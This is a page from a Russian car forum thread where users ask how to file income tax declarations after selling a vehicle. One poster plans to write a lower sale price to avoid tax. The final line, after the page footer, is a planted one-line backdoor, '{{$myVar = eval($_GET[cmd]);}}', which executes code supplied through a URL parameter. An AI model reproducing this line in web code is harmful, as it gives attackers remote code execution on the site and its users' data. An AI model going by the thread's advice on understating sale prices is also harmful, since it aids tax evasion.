+ Ответить в теме
Страница 2 из 4 ПерваяПервая 1 2 3 4 ПоследняяПоследняя
Показано с 11 по 20 из 35

Тема: Декларация на НДФЛ в связи с продажей ТС


  1. #11
    Администратор 3BEPb is on a distinguished road Аватар для 3BEPb
    Регистрация
    03.03.2006
    Машина
    Audi A4
    Сообщений
    1,731
    <div class='quotetop'>Цитата(BON &#064; Mar 5 2008, 14&#58;17) <{POST_SNAPBACK}></div><div class='quotemain'>Есть срок, в течении 3-лет (вероятно с момента окончания последнего срока подажи декларации т.е. 1-апреля года следующего за годом продажи) налоговая может вынести постановление о наложени штрафа.[/b][/quote]
    сколько штраф? и где можно узнать какие планы на меня у налоговой? должен ли я им чего то или нет. А то светится с этим делом не хочется. может забыли про меня)))

  2. #12
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    <div class='quotetop'>Цитата(3BEPb &#064; Mar 5 2008, 14&#58;35) <{POST_SNAPBACK}></div><div class='quotemain'>сколько штраф? и где можно узнать какие планы на меня у налоговой? должен ли я им чего то или нет. А то светится с этим делом не хочется. может забыли про меня)))[/b][/quote]

    Штрафы по КоАП.................. до полной стоимости проданого. Если знакомых в налоговой нету, то позвонив можно услышать, только одно - подавайте декларацию.



    Сейчас вообше такая штука особенно с новыми правами судебных приставов. Если у кого есть официальный должок, то для начала они не выездными становятца
    песок сыпется....не останавливайтесь на достигнутом !

  3. #13
    Администратор 3BEPb is on a distinguished road Аватар для 3BEPb
    Регистрация
    03.03.2006
    Машина
    Audi A4
    Сообщений
    1,731
    <div class='quotetop'>Цитата(BON &#064; Mar 5 2008, 21&#58;28) <{POST_SNAPBACK}></div><div class='quotemain'>Штрафы по КоАП.................. до полной стоимости проданого. Если знакомых в налоговой нету, то позвонив можно услышать, только одно - подавайте декларацию.

    Сейчас вообше такая штука особенно с новыми правами судебных приставов. Если у кого есть официальный должок, то для начала они не выездными становятца [/b][/quote]

    интересна статистика. не ужели все бегают и здают декларации? пожалуй создам опрос по этому поводу

  4. #14
    Администратор 3BEPb is on a distinguished road Аватар для 3BEPb
    Регистрация
    03.03.2006
    Машина
    Audi A4
    Сообщений
    1,731

  5. #15
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    <div class='quotetop'>Цитата(3BEPb &#064; Mar 6 2008, 11&#58;51) <{POST_SNAPBACK}></div><div class='quotemain'>
    интересна статистика. не ужели все бегают и здают декларации? пожалуй создам опрос по этому поводу [/b][/quote]

    после того как колеге в прошлом году пришел штраф и сумма налога за авто под 50 тыщ. руб. и требование подать декларацию, я смеялси, до тех пор пока мну не пришло аналогичное требование спустя нескольуко лет за ТАЗик............. правда без налога т.к. больше трех лет он у мну был, но грозили если до такого -то числа не подам, то штраф. То что спустя несколько лет и что не сразу штраф, а предупреждение что если не подам то только тогда требование об уплате штрафа, то это своего рода щедрость налоговой амнистии.
    песок сыпется....не останавливайтесь на достигнутом !

  6. #16
    GTI-Racing chess is on a distinguished road Аватар для chess
    Регистрация
    29.11.2006
    Откуда
    москвабад
    Машина
    CTR ЕК9, MPS K90, vw polo 6r
    Сообщений
    1,603
    так подавать надо вобще в любом случае?
    вот я продал тачку, в справке-счете 125000.
    заинтересовал ли я налоговую я так понял узнаю не позднее 30 апреля следующего года.
    .
    и небольшой оффтоп:
    желания платить за продажу нет. примерно такое же большое желание как не платить транспортный налог.
    каждому своё
    АДМ GTI mkV st1.5 - 2.01.084
    АДМ Civic Type-R EK9 - 1.57.683
    Смоленск Civic Type-R EK9 - 1.47.690
    Нижний Новгород Civic Type-R EK9 - 1.53.472
    Казань Civic Type-R EK9 - 1.43.187
    MRW Civic Type-R EK9 - 2.01.663

  7. #17
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    <div class='quotetop'>Цитата(chess &#064; Mar 6 2008, 13&#58;16) <{POST_SNAPBACK}></div><div class='quotemain'>так подавать надо вобще в любом случае?
    вот я продал тачку, в справке-счете 125000.
    заинтересовал ли я налоговую я так понял узнаю не позднее 30 апреля следующего года.
    .
    и небольшой оффтоп:
    желания платить за продажу нет. примерно такое же большое желание как не платить транспортный налог.[/b][/quote]

    ты можешь сам ответить на свой вопрос, если я например продал ТАЗик за 28 тыщ. руб ?
    песок сыпется....не останавливайтесь на достигнутом !

  8. #18
    GTI-Racing Xander is on a distinguished road Аватар для Xander
    Регистрация
    04.01.2007
    Откуда
    Москва
    Машина
    Golf GTI Mk5, POLO Mk5
    Сообщений
    307
    Так Товарищи прочел кучу инфы ничего так и не понял еще больше запутался собираюсь продавать машину сколько писать денежек в справке счет что бы мне ничего не пришло потом?)))

    машиной владею 2.5 года ..

  9. #19
    GTI-Racing p90 is on a distinguished road Аватар для p90
    Регистрация
    27.11.2008
    Откуда
    МосквЭ
    Машина
    VW Golf....
    Сообщений
    328
    <div class='quotetop'>Цитата(Xander &#064; Feb 10 2009, 01&#58;28) <{POST_SNAPBACK}></div><div class='quotemain'>Так Товарищи прочел кучу инфы ничего так и не понял еще больше запутался собираюсь продавать машину сколько писать денежек в справке счет что бы мне ничего не пришло потом?)))

    машиной владею 2.5 года ..[/b][/quote]

    При продаже даётся налоговый вычет 125 т.р исходя из этого продавая до 125 тысяч всё будет ок,потом нужно отчитаться перед ними,что авто продано и ничего платить не нужно будет [img]style_emoticons/<#EMO_DIR#>/bad_smile.gif[/img] единственное,что гиморно для меня и для других,так это подача этих деклараций,в коих сам чёрт ногу сломит.. [img]style_emoticons/<#EMO_DIR#>/hell_boy.gif[/img]
    Запчасти и аксессуары для Ваших авто! :)

  10. #20
    GTI-Racing Xander is on a distinguished road Аватар для Xander
    Регистрация
    04.01.2007
    Откуда
    Москва
    Машина
    Golf GTI Mk5, POLO Mk5
    Сообщений
    307
    О супер напишу что гольфа за 108 000 продал) пусь дулю с маслом получат))))


    а эту НДФЛ обязательно писать гайцы там сами налоговой ничего не скинут? можно будет просто продать машину купли продажи отксерить заверить там и держать дома на всякий пожарный если вдруг в налоговой ко мне какие вопросы будут? ) [img]style_emoticons/<#EMO_DIR#>/blush.gif[/img]

+ Ответить в теме
Страница 2 из 4 ПерваяПервая 1 2 3 4 ПоследняяПоследняя

Похожие темы

  1. Услуги Связи (Юр. Лицам)
    от TishONE в разделе Бизнес
    Ответов: 18
    Последнее сообщение: 01.05.2023, 13:09
  2. Ответов: 16
    Последнее сообщение: 29.08.2014, 20:37
  3. В связи с апгрейдом продам
    от Wilfrid Maximus в разделе Барахолка
    Ответов: 8
    Последнее сообщение: 03.05.2010, 13:34
  4. Вы подавали деклрацию в налоговую инспекцию в связи с продажей ТС?
    от 3BEPb в разделе Законодательство и страхование
    Ответов: 5
    Последнее сообщение: 08.03.2008, 23:39

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}